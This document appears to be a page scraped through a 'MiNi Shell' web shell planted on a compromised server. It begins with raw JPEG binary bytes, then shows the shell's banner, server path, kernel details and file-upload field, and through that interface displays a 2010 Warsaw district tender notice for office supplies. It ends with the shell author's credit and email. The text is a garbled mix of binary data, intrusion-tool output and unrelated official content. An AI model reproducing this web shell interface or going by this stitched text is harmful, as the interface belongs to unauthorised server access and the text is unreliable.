JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/17877-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów biurowych dla Urzędu m.st. Warszawy Dzielnicy Praga Północ</b><br>
<b>Numer ogłoszenia: 17877 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto st. Warszawa Dzielnica Praga Północ , ul. ks. I. Kłopotowskiego 15, 00-987 Warszawa, woj. mazowieckie, tel. 022 5900210, 59-00214, faks 022 5900215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.praga-pn.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych dla Urzędu m.st. Warszawy Dzielnicy Praga Północ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów biurowych do siedziby Zamawiającego na adres: 03- 708 Warszawa, ul. ks. I. Kłopotowskiego 15.
Koszt dostawy (załadunku, transportu do magazynu Zamawiającego na adres: 
ul. ks. I. Kłopotowskiego 15, 03-708 Warszawa oraz rozładunku) obciążają Wykonawcę.  
Dostawa artykułów biurowych realizowana będzie sukcesywnie na podstawie formularza zamówienia, w ciągu 3 dni roboczych od dnia przesłania zamówienia.

Wymagania jakościowe 
1)  Dostarczone artykuły biurowe muszą być fabrycznie nowe, wolne od wad technicznych, kompletne oraz dobrej jakości. 
2)  Materiały biurowe opisane w pozycjach formularza cenowego (załącznik Nr 2) które zostały opisane poprzez wskazanie producenta, stanowią towar powszechnie dostępny na rynku, zaś ich wskazanie, wobec braku odpowiednich norm przedmiotowych określających parametry tych artykułów, ma na celu określenie oczekiwanego standardu jakościowego i wydajnościowego zamawianych artykułów.
3)  Dostarczone artykuły biurowe muszą spełniać oczekiwany standard jakościowy 
i wydajnościowy, który został określony w formularzu cenowym (załącznik Nr 2) stanowiący jednocześnie opis przedmiotu zamówienia. 
4)  W pozycjach w których Zamawiający wprowadził nazwy producenta dopuszcza się materiały równoważne, pod warunkiem, że posiadają one takie same lub lepsze parametry techniczne i jakościowe jak artykuły wskazanych producentów. 
5)  Wykonawca zobowiązany jest dołączyć do oferty kartę katalogową (czytelną) produktu z opisem i zdjęciem oferowanych produktów potwierdzającą wymagania określone przez Zamawiającego w pozycjach formularza cenowego oznaczone * w kolumnie z nazwą producenta.   
6)  Wykonawca, który poda nazwę producenta w formularzu cenowym, którego nie ma w -Katalogach artykułów biurowych- zobowiązany jest także dołączyć do oferty kartę katalogową produktu, o której jest mowa w ustępie 5. 
7)  Dostarczony  towar musi być firmowo opakowany i posiadać na opakowaniu nazwę producenta, zgodną z nazwą uwidocznioną w formularzu cenowym.

Szczegółowy zakres dostawy, rozwiązania materiałowe, jakościowe, warunki wykonania i odbioru dostawy określa:
1)  Formularz cenowy (stanowiący jednocześnie opis przedmiotu zamówienia),
2)   Wzór umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W postępowaniu wymagane jest wadium w wys. 3 000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:
1)   posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)   posiadania wiedzy i doświadczenia;
3)   dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)   sytuacji ekonomicznej i finansowej.

Za spełniających warunki udziału w postępowaniu  Zamawiający uzna wykonawców, którzy złożą:
-  oświadczenie o spełnieniu warunków udziału w postępowaniu 
oraz wykażą, że:
-  posiadają doświadczenie zawodowe wyrażające się wykonaniem z należytą starannością  dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 dostaw materiałów biurowych o wartości nie mniejszej niż 100 000, 00 zł brutto każda zgodnie z załącznikiem Nr 5.
Złożenie przez wykonawcę w ofercie dokumentów i oświadczeń na potwierdzenie spełnienia warunków wymienionych powyżej, będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu.
Zamawiający sprawdzi z treści tych dokumentów i oświadczeń, czy wykonawca spełnia wszystkie ww. warunki.
Zamawiający żąda, żeby wykonawca wykazał, nie później niż na dzień składania ofert spełnianie warunków o których mowa w art. 22 ust. 1 ustawy.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć w terminie wskazanym w Części VIII pkt 1 i formie określonej w Części VII SIWZ:

1.  Ofertę, która  powinna składać się z:
a)  wypełnionego formularza ofertowego o treści zgodnej z określoną we wzorze 
     stanowiącym załącznik Nr 1 do SIWZ. 
     Zgodnie z art. 36 ust. 4 ustawy Zamawiający żąda, aby wykonawca wskazał w 
     formularzu oferty części zamówienia, których wykonanie powierzy 
     podwykonawcom.
     W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o 
     udzielenie zamówienia, oświadczenie woli składa pełnomocnik reprezentujący 
     Wykonawców w postępowaniu.
b)  potwierdzenia wniesienia wadium (decyduje data wpływu na konto   
     Zamawiającego);
c)  wypełnionego formularza cenowego o treści zgodnej z określoną we wzorze 
     stanowiącym załącznik Nr 2 do SIWZ, wyliczonego i podpisanego przez 
     Wykonawcę;
e)  pełnomocnictwo do podpisania oferty, gdy Wykonawcę reprezentuje pełnomocnik 
     lub gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia;      
f)  karty katalogowe produktów z opisem i zdjęciem;
g)  dokumentów i oświadczeń wymienionych w punkcie 3.2 i 3.3 części III niniejszej 
     specyfikacji.

2.  Oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
a)  oświadczenie Wykonawcy o spełnieniu warunków wymienionych w art. 22 ust. 1 
     ustawy, zgodnie z treścią wzoru załącznika Nr 3;
     W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
     powyższe oświadczenie składa w imieniu wszystkich pełnomocnik Wykonawców.
b)  pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji 
     niezbędnych zasobów na okres korzystania z nich przy wykonania zamówienia,     
     jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym,      
     osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych 
     podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - 
     załącznik Nr 6.   
c)  wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również 
     wykonywanych, dostaw w zakresie niezbędnym do wykazania spełniania warunku 
     wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu 
     składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym 
     okresie, co najmniej 2 dostaw o wartości nie mniejszej niż 100 000, 00 zł brutto 
     każda, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców zgodnie z 
     załącznikiem Nr 5.
     Do wykazu należy dołączyć dokumenty potwierdzające, że dostawy te zostały 
     wykonane należycie (np. referencje od poprzednich zamawiających).
     W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o 
     udzielenie zamówienia, z przedstawionych dokumentów musi wynikać, że warunki 
     udziału w postępowaniu zostały spełnione łącznie przez te podmioty.

3.  Oświadczenia i dokumenty potwierdzające niepodleganie wykonawcy wykluczeniu 
     z postępowania:
a)  oświadczenie Wykonawcy, o braku podstaw do wykluczenia z powodu   
     niespełnienia warunków o których mowa w art. 24 ust.1 ustawy - zgodnie z 
     treścią wzoru stanowiącego załącznik Nr 4; 
     W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o 
     udzielenie zamówienia, oświadczenie to składa każdy Wykonawca odrębnie.
     Jeżeli wykonawca powołuje się na zasoby innych podmiotów, każdy z tych 
     podmiotów musi złożyć oświadczenie.
b)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
     ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do
     rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie 
     wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
     W przypadku oferty składanej przez Wykonawców wspólnie ubiegających 
     się o udzielenie zamówienia, dokument ten składa każdy Wykonawca odrębnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: http://aukcje.um.warszawa.pl</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.praga-pn.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzib Zamawiającego, WOM parter, stanowisko 18, godz.8:00-16:00, opłata w kasie na parterze;.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, 03-708 Warszawa. ul. ks. I. Kłopotowskiego 15, pok. 339, III p. (Wydział Zamówień Publicznych)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com